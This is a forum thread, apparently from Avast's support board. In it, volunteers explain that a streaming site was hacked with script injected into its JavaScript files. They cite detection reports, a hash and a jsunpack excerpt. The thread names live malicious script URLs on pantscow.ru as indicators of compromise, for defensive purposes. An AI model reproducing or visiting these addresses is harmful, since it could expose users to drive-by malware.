Avast blocking www.motionempire.com

I am new to this forum.
Any idea why Avast is now blocking hxxp://www.motionempire.com?
Is there a safe way to access hxxp://www.motionempire.com without installing a different anti-virus?
Thank you!
Sherry

Attached are the two alerts that I am getting. First the Malware one then the Trojan
Thank you for any assistance.

Hi smheard,

Make the links non-click-through by putting wXw for www or htxp for http:
On the site there is a link to: pantscow.ru:8080/Tag.js French site with malicious activity …Adobe flash exploit abused - undefined variable Behaviour
error: undefined function Behaviour.register…

Has this site acted as an intermediary resulting in further distribution of malware?

Yes, pantscow.ru appeared to function as an intermediary for the infection of 2 sites including oykuforum.com/, izmirkamyoncularodasi.org.tr/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 91 domains, including fo4.ru/, robertpattinson.org/, partnerilan.gen.tr/,

The site is ill-reported here: http://www.mywot.com/en/scorecard/motionempire.com
So you can safely visit it when the site has been cleansed or try to use an online proxy for the time being,
deactivate Javascript then…

polonus

There appears to be a packed javascript file being loaded with this site (image1) and it is that which avast is alerting on.

avast isn’t alone in finding something suspect about this file, http://www.virustotal.com/analisis/358a9bdafbb9410d9fefec346f947071870f38e1e3b1f21027a3daee0d92c4e6-1279309742.

So there isn’t really a safe way to access the site as it looks like it may have been hacked (very common now).

There is a second alert on another .js file (image2) and this has certainly been hacked with the insertion of a script tag at the end of the file, image3. So it may be that this is also what has happened in the first packed javascript file (which I can’t read because of its packing). This script tag is trying to run another script on what is most likely a malicious site (Russian domain).

http://www.virustotal.com/analisis/eecd67e1c7b985286c0d5a8f53349b42564a140732f4f1589e4a12a4c7052208-1279310668

There are more alerts and it appears that all the .js (javascript) files have been hacked in the same way; so the site has been hacked and there really is no safe way to connect to it until they have the infection cleaned and any vulnerability (reason why it got hacked) closed.

Also see, http://www.UnmaskParasites.com/security-report/?page=www.motionempire.com.

  • Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.

Hi DavidR,

But it is strange, that Sherry blames the scanner for flagging a malicious website and disconnecting her computer from a possible malware infection. Why then ask if she has to change to another av solution? Any good av solution would prevent her from going there as long as the malcode is on that website server…
This sort of comments explains that the majority of users do not know that there are reputable clean sites being hacked “en masse” by cybercriminals/malcreants/malvertisers and also a lot of users do not know what an exploit is, and more important what it could do! It is good that we can help them to fully understand the full size of the malware exposure and the threats out there,

polonus

I don’t comment on issues like that I just give the facts about the detection and let them make up their own minds. The problem is that people still have the concept of a safe site, which is or hasn’t been the case for some considerable time, so they automatically blame their AV, security software.

Hi DavidR,

Strange because it may be a real issue, a consumer research in the Netherlands, my country, recently has found that over 80% of my fellow countrymen do not know what is meant by terms like root kits, bot nets and exploits. Then 33% of users in this survey do not secure their wireless networks in any way. Still more than 76% of the 3.000 participating in the survey feels quite secure online, because of their online behavior patterns and good security…
Well all this may be considered as shocking and far from what is the reality as we experience it here, and in other countries the overall situation may be not very much better…leaves a lot for improvement, there is still a lot to do for us,

polonus

My thought about needing to switch AV is because my husband’s AVG is not alerting so I thought it was a false positive. Still find it strange and still want to watch my shows. :cry:

Hi smheard,

I can very well understand that, avast just has a good detection and probably Avira missed it and you do not want malware on your computer from going to that site, what you could do is send a mail to that website (abuse address) and give them the link to your thread, so they can clean their site of the malware at hand. It is not you, it is not your computer, it is something with the motionempire.com website, some malcreant has tried an exploit, got access to the site without the site-owner/admin/webmaster knowing and injected malicious script there. That is what happened, no avast has saved you from getting an infection from there into you computer by disconnecting…

There are thousands and thousands of reputable good sites hacked by malcreants by using flaws in the webpage software and to use these hacks for getting malware to user’s machines with silent drive-by-downloads. You do not want your computer to be turned into a spam spewing bot or slowing down or showing strange unwanted sites, do you?
So go back to this favorite site when it is clean again and go to visit there through a proxy, and again it is not only avast finding the site malicious, see here: http://www.unmaskparasites.com/security-report/?page=www.motionempire.com

Stay safe and secure is the wish of, and I hope the site will be cleansed of the malcode very soon,

greets,

polonus

Nothing strange the site has been hacked and needs to be cleaned. The hack tries to run script at a malicious site, see image, avast blocks that too and avast isn’t the only one to consider it suspect, http://www.mywot.com/en/scorecard/pantscow.ru.

The problem is that there are only a few AV even looking for this type of hacked site, etc. and less that are even capable of detecting it and that is why there are so few results/hits on the VirusTotal scans.

Hi smheard,

Yes, DavidR is right there, avast has a remarkable detection rate with the shields, top of the bill, … I even have a double protection on board of my browser, I have the avast shields to protect me and I will not run certain script and block them with the NoScript extension inside the Firefox browser,

polonus

Hi malware fighters,

Here is another site with similar code there: htxp://www.izmirkamyoncularodasi.org.tr/
Re: htxp://jsunpack.jeek.org/dec/go?report=5fff316c2b47cdd4f5af10ef3fd4d4c188d6970a

info: [script] pantscow.ru:8080/Heat_Sink.js   
     info: [decodingLevel=0] found JavaScript
     error: line:71: SyntaxError: missing } in XML expression:
          error: line:71: for (m=0;m<message.length;m++)
          error: line:71: ^
     error: line:3: SyntaxError: missing = in XML attribute:
          error: line:3: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          error: line:3: ...............^
     file: fetch_cd2b75c3629b4039bf7e14240f0af2bb3659fd0e: 39533 bytes 

polonus

Hi malware fighters,

Just info about the malware domain:
MD5: 092ed973686c9074320328a731bb1587
Infection Type: JS
Description: Malicious Javascript can either source in or directly execute code on a web page that can conduct drive-by-downloads, cause unwanted pop-ups or pop-unders, log keystrokes, steal browsing history, and so on.
Code Length: 73 bytes
Code Sample:

Read about it here: http://ddanchev.blogspot.com/2010/07/spamvertised-amazon-verify-you-email.html http://www.gnucitizen.org/blog/the-10000-sites-js-malware-source-code-leaked/ Examples: http://sucuri.net/malware/entry/MW:JS:151 polonus

VirusTotal - pantscow.ru - 4/41
http://www.virustotal.com/analisis/0890b0d1a49807d8e9420b8bfe4e9947784ea0adffc4443d3f905c606020beb4-1279577739

Hi Pondus,

Yes, we have a good avast/GData detection here, I fired the URL up to finjan’s and they found “nada”…
Another nice informative link on this javascript malware:
http://sucuri.net/malware/entry/MW:JS:150
And again thanks for the VT check,
just another interesting link for you: http://www.malwaregroup.com/Domains/details/pantscow.ru

Damian